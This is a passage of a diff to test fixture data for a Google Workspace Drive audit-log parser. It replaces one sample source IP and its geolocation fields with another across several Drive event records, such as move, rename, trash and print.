+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"access\",\"name\":\"add_lock\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"}]}}",
         "event.provider": "drive",
         "event.type": [
             "change"
@@ -607,27 +571,23 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 6492,
+        "log.offset": 6483,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo",
             "owner"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -648,7 +608,7 @@
         "event.dataset": "google_workspace.drive",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"access\",\"name\":\"move\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"destination_folder_id\",\"value\":\"1234\"},{\"name\":\"destination_folder_title\",\"value\":\"folder title\"},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"},{\"name\":\"source_folder_id\",\"value\":\"1234\"},{\"name\":\"source_folder_title\",\"value\":\"a folder title\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"access\",\"name\":\"move\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"destination_folder_id\",\"value\":\"1234\"},{\"name\":\"destination_folder_title\",\"value\":\"folder title\"},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"},{\"name\":\"source_folder_id\",\"value\":\"1234\"},{\"name\":\"source_folder_title\",\"value\":\"a folder title\"}]}}",
         "event.provider": "drive",
         "event.type": [
             "change"
@@ -674,27 +634,23 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 7196,
+        "log.offset": 7186,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo",
             "owner"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -715,7 +671,7 @@
         "event.dataset": "google_workspace.drive",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"access\",\"name\":\"preview\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"access\",\"name\":\"preview\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"}]}}",
         "event.provider": "drive",
         "event.type": [
             "info"
@@ -737,27 +693,23 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 8102,
+        "log.offset": 8091,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo",
             "owner"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -778,7 +730,7 @@
         "event.dataset": "google_workspace.drive",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"access\",\"name\":\"print\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"access\",\"name\":\"print\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"}]}}",
         "event.provider": "drive",
         "event.type": [
             "info"
@@ -800,27 +752,23 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 8805,
+        "log.offset": 8793,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo",
             "owner"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -841,7 +789,7 @@
         "event.dataset": "google_workspace.drive",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"access\",\"name\":\"remove_from_folder\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"},{\"name\":\"source_folder_id\",\"value\":\"1234\"},{\"name\":\"source_folder_title\",\"value\":\"a folder title\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"access\",\"name\":\"remove_from_folder\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"},{\"name\":\"source_folder_id\",\"value\":\"1234\"},{\"name\":\"source_folder_title\",\"value\":\"a folder title\"}]}}",
         "event.provider": "drive",
         "event.type": [
             "change"
@@ -865,27 +813,23 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 9506,
+        "log.offset": 9493,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo",
             "owner"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -906,7 +850,7 @@
         "event.dataset": "google_workspace.drive",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"access\",\"name\":\"rename\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":true},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"bar.gif\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"},{\"name\":\"old_value\",\"value\":\"foo.gif\",\"new_value\":\"bar.gif\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"access\",\"name\":\"rename\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":true},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"bar.gif\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"},{\"name\":\"old_value\",\"value\":\"foo.gif\",\"new_value\":\"bar.gif\"}]}}",
         "event.provider": "drive",
         "event.type": [
             "change"
@@ -930,27 +874,23 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 10319,
+        "log.offset": 10305,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo",
             "owner"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -971,7 +911,7 @@
         "event.dataset": "google_workspace.drive",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"access\",\"name\":\"untrash\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"access\",\"name\":\"untrash\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"}]}}",
         "event.provider": "drive",
         "event.type": [
             "creation"
@@ -993,27 +933,23 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 11074,
+        "log.offset": 11059,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo",
             "owner"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -1034,7 +970,7 @@
         "event.dataset": "google_workspace.drive",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"access\",\"name\":\"sheets_import_range\",\"parameters\":[{\"name\":\"sheets_import_range_recipient_doc\",\"value\":\"1234\"},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"access\",\"name\":\"sheets_import_range\",\"parameters\":[{\"name\":\"sheets_import_range_recipient_doc\",\"value\":\"1234\"},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"}]}}",
         "event.provider": "drive",
         "event.type": [
             "change"
@@ -1056,27 +992,23 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 11777,
+        "log.offset": 11761,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo",
             "owner"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -1097,7 +1029,7 @@
         "event.dataset": "google_workspace.drive",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"access\",\"name\":\"trash\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"access\",\"name\":\"trash\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"}]}}",
         "event.provider": "drive",
         "event.type": [
             "deletion"
@@ -1119,27 +1051,23 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 12514,
+        "log.offset": 12497,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo",
             "owner"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -1160,7 +1088,7 @@
         "event.dataset": "google_workspace.drive",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"access\",\"name\":\"remove_lock\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"}]}}",
